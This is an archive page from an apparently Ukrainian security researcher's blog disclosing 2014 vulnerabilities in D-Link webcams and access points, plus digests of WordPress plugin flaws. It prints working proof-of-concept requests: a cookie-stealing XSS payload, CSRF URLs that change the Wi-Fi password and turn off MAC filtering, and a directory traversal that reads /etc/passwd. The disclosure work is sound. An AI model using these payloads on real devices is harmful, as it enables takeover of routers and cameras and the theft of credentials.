Архів для категорії 'Уразливості'

BF та XSS уразливості в D-Link DCS-2103

17:21 16.12.2014

01.08.2014

У липні, 11.07.2014, я виявив Brute Force та Cross-Site Scripting уразливості в D-Link DCS-2103 (веб камера). Це друга частина дірок в DCS-2103.

Раніше я писав про DT та FPD уразливості в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

16.12.2014

Brute Force (WASC-11):

http://site

Немає захисту від BF атак.

Cross-Site Scripting (WASC-08):

http://site/vb.htm?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Уразлива версія D-Link DCS-2103, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Розробники відмовилися виправляти BF уразливість, а XSS уразливість виправлена в прошивці версії 1.20.

Добірка уразливостей

16:27 12.12.2014

В даній добірці уразливості в веб додатках:

  • HP LoadRunner Virtual User Generator, Remote Code Execution (деталі)
  • Vulnerability in PHPFox v3.7.3, v3.7.4 and v3.7.5 all build (деталі)
  • Pearson eSIS Enterprise Student Information System SQL Injection (деталі)
  • Pearson eSIS Enterprise Student Information System Stored XSS (деталі)
  • strongswan security update (деталі)

Уразливості в плагінах для WordPress №163

23:55 10.12.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Bonuspressx, cnhk-slideshow і Simple Popup. Для котрих з’явилися експлоіти. Bonuspressx - це спеціальний плагін, cnhk-slideshow - це плагін для створення слайдшоу, Simple Popup - це плагін для створення попапів.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

CSRF та XSS уразливості в D-Link DAP-1360

23:55 29.11.2014

28.06.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

29.11.2014

CSRF (WASC-09):

В розділі Wi-Fi - Basic settings можна змінити параметри Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

В розділі Wi-Fi - Security settings можна змінити параметри Network Authentication, Encryption Key PSK, WPA2 Pre-authentication (при вибраному WPA2), WPA Encryption, WPA reneval. А також ряд параметрів (як то RADIUS_Server, RADIUS_Port і RADIUS_Key), які відсутні в GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

Даним запитом змінюються вищезгадані параметри, в тому числі пароль точки доступу.

XSS (WASC-08):

Вставити <script>alert(document.cookie)</script> в поле Quick search. Це Strictly Social XSS.

Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.

Добірка уразливостей

16:20 27.11.2014

В даній добірці уразливості в веб додатках:

CSRF та XSS уразливості в D-Link DAP-1360

23:52 26.11.2014

21.06.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

26.11.2014

CSRF (WASC-09):

В розділі Wi-Fi - MAC filter - Filter mode можна змінити параметр MAC filter restrict mode:

Disabled:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}

Allow:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}

Deny:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}

В розділі Wi-Fi - MAC filter - MAC addresses можна додавати і видаляти MAC адреси:

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

XSS (persistent XSS) (WASC-08):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]

Код спрацює на http://192.168.0.50/index.cgi#wifi/mac.

Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.

Уразливості в плагінах для WordPress №162

23:54 25.11.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Photo-Gallery і Formidable Forms та програма Night Lion Security PHP Stress. Для котрих з’явилися експлоіти. Утіліта PHP Stress призначенна для проведення тестування вразливості до DoS атак, Photo-Gallery - це плагін для створення фото галерей, Formidable Forms - це плагін для створення форм.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:29 25.11.2014

В даній добірці уразливості в веб додатках:

  • HP Application LifeCycle Management, ALM client component, Remote Execution of Arbitrary Code (деталі)
  • php-font-lib 0.3 www/make_subset.php Reflected Cross Site Scripting (деталі)
  • nagios vulnerability (деталі)
  • vulnerabilities in icinga (деталі)
  • polarssl security update (деталі)

Уразливості в D-Link DCS-910

23:54 15.11.2014

У листопаді, 05.11.2014, я виявив Abuse of Functionality, Brute Force та Cross-Site Request Forgery уразливості в D-Link DCS-910 (веб камера).

Раніше я писав про уразливості в D-Link DCS-930L.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

DT та FPD уразливості в D-Link DCS-2103

17:22 15.11.2014

11.07.2014

Сьогодні я виявив уразливості в D-Link DCS-2103 (веб камера). Зокрема Directory Traversal та Full path disclosure уразливості. Це перша частина дірок в DCS-2103.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP 1150 та D-Link DAP-1360.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

15.11.2014

Directory Traversal (Arbitrary File Download) (WASC-33):

http://site/cgi-bin/sddownload.cgi?file=/../../etc/passwd

Full path disclosure (WASC-13):

http://site/cgi-bin/sddownload.cgi?file=/

Уразлива версія D-Link DCS-2103, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.